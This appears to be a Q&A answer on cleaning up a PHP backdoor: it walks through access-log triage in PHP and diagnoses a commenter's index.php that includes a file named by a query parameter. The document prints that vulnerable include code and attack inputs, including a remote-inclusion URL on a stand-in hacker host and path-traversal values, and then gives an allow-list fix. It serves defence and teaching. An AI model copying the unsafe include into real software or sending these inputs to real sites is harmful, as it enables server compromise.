rename the file immediately (to an extension other than .php, so the web server no longer executes it) before inspecting it further; that way the attacker can't use it anymore.
Then investigate how they were able to get this file onto your server.
In your access logs you will find the requests that loaded that specific PHP file. That is your first clue. Look at the other requests from the same IP address and see which scripts they accessed or abused. Somewhere you will probably find an outdated, vulnerable WordPress plug-in, Joomla plug-in, or similar. Update or remove that plug-in ASAP, or you will be hacked again soon!
While checking the access logs, also look for newly uploaded backdoors: you may see the same IP address calling scripts that should not exist at all. Delete or rename those too!
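To make the log triage concrete, here is an added example (not part of the original post) that walks the steps above over a handful of constructed combined-format access-log lines: find every client IP that requested the backdoor, list everything else those IPs did, and flag any other .php target that is not one of your own scripts. The backdoor path, the list of legitimate scripts and the log lines are all assumptions made up for this example.

```php
<?php
// Added example (not from the original post): access-log triage in the order
// the text describes. The backdoor path, the list of legitimate scripts and
// the log lines are all constructed for this example.

$backdoor     = '/uploads/images.php';                       // hypothetical: the file you found
$knownScripts = ['/index.php', '/videos.php', '/about.php']; // hypothetical: your real scripts

$log = <<<'LOG'
10.0.0.5 - - [12/Mar/2012:10:01:02 +0000] "GET /index.php?go=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2012:10:03:10 +0000] "GET /index.php?go=uploads/images HTTP/1.1" 200 40 "-" "curl/7.21"
203.0.113.7 - - [12/Mar/2012:10:03:40 +0000] "POST /uploads/images.php HTTP/1.1" 200 1024 "-" "curl/7.21"
203.0.113.7 - - [12/Mar/2012:10:05:12 +0000] "GET /cache/sess.php?cmd=id HTTP/1.1" 200 33 "-" "curl/7.21"
10.0.0.9 - - [12/Mar/2012:10:06:00 +0000] "GET /videos.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
LOG;

// Parse one line in Apache/nginx "combined" format; null for lines that don't match.
function parseLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $url = parse_url($m[3]);
    return [
        'ip'     => $m[1],
        'method' => $m[2],
        'path'   => $url['path'] ?? $m[3],
        'query'  => $url['query'] ?? '',
        'status' => (int) $m[4],
    ];
}

function triage(string $log, string $backdoor, array $knownScripts): array
{
    $entries = array_filter(array_map('parseLine', explode("\n", trim($log))));

    // Step 1: which client IPs ever requested the backdoor?
    $suspects = [];
    foreach ($entries as $e) {
        if ($e['path'] === $backdoor) {
            $suspects[$e['ip']] = true;
        }
    }

    // Step 2: everything else those IPs did (this is where the entry point shows up).
    // Step 3: other .php targets that are neither the backdoor nor one of ours.
    $activity = [];
    $otherBackdoors = [];
    foreach ($entries as $e) {
        if (!isset($suspects[$e['ip']])) {
            continue;
        }
        $activity[$e['ip']][] = sprintf('%s %s%s -> %d', $e['method'], $e['path'],
            $e['query'] !== '' ? '?' . $e['query'] : '', $e['status']);
        if (substr($e['path'], -4) === '.php'
            && $e['path'] !== $backdoor
            && !in_array($e['path'], $knownScripts, true)) {
            $otherBackdoors[$e['path']] = true;
        }
    }

    return [
        'suspects'        => array_keys($suspects),
        'activity'        => $activity,
        'other_backdoors' => array_keys($otherBackdoors),
    ];
}

$r = triage($log, $backdoor, $knownScripts);
foreach ($r['suspects'] as $ip) {
    echo "Suspect $ip:\n";
    foreach ($r['activity'][$ip] as $line) {
        echo "  $line\n";
    }
}
echo "Unknown .php files those IPs called (candidate backdoors):\n";
foreach ($r['other_backdoors'] as $p) {
    echo "  $p\n";
}
```

On the constructed input this reports 203.0.113.7 as the only suspect, shows the index.php?go=uploads/images request that preceded the first hit on the backdoor, and lists /cache/sess.php as a second file to go and look at. On a real server read the log with a stream instead of a heredoc, and pivot on the User-Agent as well as the IP, since attackers change addresses between visits.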
What this code does is simple, yet fairly advanced: it allows whoever holds the password to execute any code that you could execute through PHP. The advanced bit is that it is hard to detect: it uses no base64, no eval(), etc.
edit:
idealizm said in the comments:
I'm actually not using WordPress (or any other CMS) on this domain, but I do have an index.php file which handles the dynamic creation of various pages by doing an include of an existing file prefixed with an underscore, so index.php?go=about would include("about.php"). It checks if the file exists and, if not, only includes the default file. I was hoping that this was secure enough. Is this where they might have exploited my code?

```php
if ($_GET['go'] == '') {
    $go = 'videos';
} else {
    $go = $_GET['go'];
}
if (!(file_exists('' . $go . '.php'))) {
    $go = 'videos';
}
include($go . '.php'); // the include described above
```
Yes, that may well be your problem! You say the included file is prefixed with an underscore, but I don't see that in your code: whatever a visitor puts in go ends up in the include. One caveat on the remote case: file_exists() cannot stat http:// URLs, so index.php?go=http://hackerssite.com/hackerscode fails the check and falls back to videos, and a remote include would additionally need allow_url_include, which is off by default. The local case needs no such help. If the attacker managed to upload a .php file anywhere on the disk (which is exactly what the backdoor above is), then index.php?go=uploads/backdoor or index.php?go=../some/path/backdoor passes the file_exists() check, and your index.php includes and executes the attacker's code, allowing for havoc.

Remove (and never allow) inclusion of direct user input. Check $_GET['go'] against an array of allowed include pages, or use a switch to select the file to include.
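The following is an added example, not the commenter's or the post author's code. It puts the selection logic from the comment next to an allow-list version, with a constructed list of files standing in for the real file_exists() check, and feeds both a normal request, a local-file attack and the remote-file attempt from the reply. The file list, the page names and the request values are all made up for the example.

```php
<?php
// Added example, not the commenter's or the post author's code. The list of
// files is constructed: the last entry plays the uploaded backdoor.
$filesOnDisk = ['videos.php', 'about.php', 'uploads/images.php'];
$exists = fn(string $path): bool => in_array($path, $filesOnDisk, true);

// UNSAFE (the pattern from the comment): the visitor's value decides which
// file is included. file_exists() only asks "is there such a .php file?", and
// the attacker's upload is exactly that.
function unsafeTarget(array $get, callable $exists): string
{
    $go = ($get['go'] ?? '') === '' ? 'videos' : $get['go'];
    if (!$exists($go . '.php')) {
        $go = 'videos';
    }
    return $go . '.php';   // the original then does include() on this value
}

// SAFE: the request only picks a key; filenames live in our own table, so no
// traversal, URL wrapper or uploaded file can be reached through it.
const PAGES = [
    'videos'  => '_videos.php',
    'about'   => '_about.php',
    'contact' => '_contact.php',
];

function safeTarget(array $get): string
{
    $go = $get['go'] ?? 'videos';
    return PAGES[$go] ?? PAGES['videos'];   // unknown key -> default page
}

// Constructed requests: normal page, local-file attack, remote-file attempt.
foreach (['about', 'uploads/images', 'http://hackerssite.com/hackerscode'] as $go) {
    printf("go=%-38s unsafe includes %-22s safe includes %s\n",
        $go, unsafeTarget(['go' => $go], $exists), safeTarget(['go' => $go]));
}
// In index.php the last line would be: include __DIR__ . '/' . safeTarget($_GET);
```

Run with PHP 7.4 or later. The unsafe version hands uploads/images.php to include() because the file exists, while the remote URL falls back to videos.php for the reason given in the reply; the allow-list version maps both attack inputs to the default page, because the request never supplies a filename, only a key. A switch with one case per page is the same idea written out longhand.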